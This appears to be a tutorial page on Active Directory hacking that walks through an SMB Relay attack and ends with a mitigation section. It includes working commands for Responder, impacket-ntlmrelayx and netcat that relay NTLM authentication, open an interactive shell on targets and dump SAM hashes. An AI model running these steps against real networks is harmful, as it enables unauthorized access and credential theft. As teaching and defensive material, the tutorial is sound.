Attacks - Active Directory Hacking

SMB Relay

What is SMB Relay?

SMB Relay is an attack where an attacker captures authentication attempts and relays them to another machine on the network. Instead of cracking the hash like in LLMNR Poisoning, the attacker forwards the authentication to access other systems.

How it works?

  1. Attacker sets up a malicious SMB server to capture authentication attempts.
  2. Target machine attempts to authenticate to the attacker’s machine.
  3. Instead of storing the hash, attacker immediately relays these credentials.
  4. Attacker forwards authentication attempt to another target machine.
  5. If successful, attacker gains access to the second target with the relayed credentials.
  6. Attacker can execute commands on the target system with the relayed user’s privileges.

Demo Time

To check if the SMB signing is disabled on a target machine, run:

nmap -sV -p445 --script=smb-security-mode <target-ip>

you should see something like this:

| smb-security-mode:
|   2.02:
|_   Message signing enabled but not required

We’ll use Impacket’s ntlmrelayx.py to perform SMB Relay attacks. First, disable SMB and HTTP in Responder’s configuration file:

sudo nano /etc/responder/Responder.conf

then Set SMB and HTTP to Off.

Start Responder:

sudo responder -I eth0 -dwv

In another terminal, start ntlmrelayx:

sudo impacket-ntlmrelayx -tf targets.txt -smb2support

or for interactive mode:

sudo impacket-ntlmrelayx -tf targets.txt -smb2support -i

and to get the shell on the target machine:

nc 127.0.0.1 <port-ntlmrelayx-is-listening-on>

This will start relaying authentication attempts to the targets specified in targets.txt. You should see dumped SAM hashes like this:

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:BLAH:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:BLAH:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:BLAH:::
WDAGUtilityAccount:504:BLAH:3

When a user attempts to access a non-existent share, their credentials will be relayed to the targets specified in targets.txt.

Note: SMB Relay works best when targeting machines where SMB signing is disabled and relayed user is admin on the target machine.

Mitigation

To protect against SMB Relay attacks:

  1. Enable SMB Signing

    • Enable SMB Signing on all machines
    • Make it required, not just enabled
    • Configure through Group Policy
    • Can cause issues with legacy apps that don’t support signing and file copies.

  2. Authentication Security

    • Implement Least Privilege Principle
    • Use Strong Authentication Methods
    • Enable Multi-Factor Authentication

  3. System Hardening

    • Keep Systems Updated
    • Disable NTLM authentication on network through Group Policy > Computer Configuration > Administrative Templates > Network > Network Security > LAN Manager Authentication Level
    • Use Kerberos Authentication instead of NTLM

  4. Additional Measures

    • Regular Security Audits
    • Monitor for Suspicious Activities
    • Train Users on Security Awareness